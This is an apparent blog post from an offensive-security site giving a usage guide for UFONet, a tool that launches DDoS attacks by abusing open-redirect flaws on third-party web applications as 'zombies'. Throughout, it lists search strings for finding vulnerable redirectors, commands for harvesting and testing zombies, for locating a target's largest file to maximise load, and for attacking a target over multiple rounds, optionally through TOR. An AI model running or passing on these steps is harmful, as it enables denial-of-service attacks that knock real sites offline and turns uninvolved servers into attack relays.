Security of Information, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, etc etc...

Thursday, January 7, 2016

UFONet - is a tool designed to launch DDoS attacks






UFONet - is a tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third party web applications, like botnet.


See this links for more info:


º CWE-601:Open Redirect: http://cwe.mitre.org/data/definitions/601.html


º OWASP:URL Redirector Abuse: 

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

º Web: http://ufonet.03c8.net


Installing:


UFONet runs on many platforms. It requires Python (2.x.y) and the following libraries:


   python-pycurl - Python bindings to libcurl

   python-geoip  - Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

   sudo apt-get install python-pycurl python-geoip


Source libs:

   º Python: https://www.python.org/downloads/

   º PyCurl: http://pycurl.sourceforge.net/
   º PyGeoIP: https://pypi.python.org/pypi/GeoIP/

Searching for ‘zombies’

UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites.

A common query string should be like this:

‘proxy.php?url=’
‘check.cgi?url=’
‘checklink?uri=’
‘validator?uri=’

So for example, you can begin a search with:

./ufonet -s 'proxy.php?url='

At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.

Wanna check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’, your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

with verbose:

./ufonet -s 'proxy.php?url=' -v
retrieve 15 urls:
./ufonet -s 'proxy.php?url=' --sn 15


Testing botnet

Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.

Urls of the ‘zombies’ should be like this:

http://target.com/check?uri=

After that, launch it:

./ufonet -t zombies.txt

At the end of the process, you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:

with verbose:

./ufonet -t zombies.txt -v
with proxy TOR:
./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"


Inspecting a target
This option is useful to know the best place to attack your target.

It will crawl your objetive to provide you with a URL path to the largest object (size)found in the HTML code.

./ufonet -i http://target.com

Then, you will can drive your ‘zombies’ to reload just there, doing your most effective attack.

./ufonet -a http://target.com -b "https://cdn.server.net/biggest_file_on_target.xxx"


Attacking a target

Enter a target to attack, with the number of rounds that will be attacked:

./ufonet -a http://target.com -r 10

This will attack the target, with the list of ‘zombies’ that your provided on: “zombies.txt”, a number of 10 times for each ‘zombie’. That means, that if you have a list of 1.000 ‘zombies’, the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.

By default, if you don’t put any round, it will apply only 1.

Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems, this will do the attack more effective.

./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:

with verbose:

./ufonet -a http://target.com -r 10 -v
with proxy TOR:
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
with a place:
./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"


GUI/Web Interface
You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience.

To launch it, use:

./ufonet --gui


This will open a tab on your default browser with all the options of the tool.




Share:

0 comentários:

Post a Comment

Copyright © Offensive Sec 3.0 | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition